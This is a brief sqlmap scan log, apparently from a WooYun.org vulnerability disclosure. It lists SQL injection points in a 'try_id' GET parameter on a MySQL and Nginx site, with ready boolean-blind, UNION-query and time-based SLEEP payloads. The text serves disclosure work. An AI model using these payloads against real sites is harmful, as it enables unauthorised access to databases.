WooYun.org

sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Place: GET
Parameter: try_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: try_id=215 AND 5723=5723
    Type: UNION query
    Title: MySQL UNION query (NULL) - 21 columns
    Payload: try_id=-7796 UNION ALL SELECT NULL,NULL,CONCAT(0x3a7466723a,0x6b4c4
e51755a55477a56,0x3a776e683a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: try_id=215 AND SLEEP(5)
---
[20:21:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.11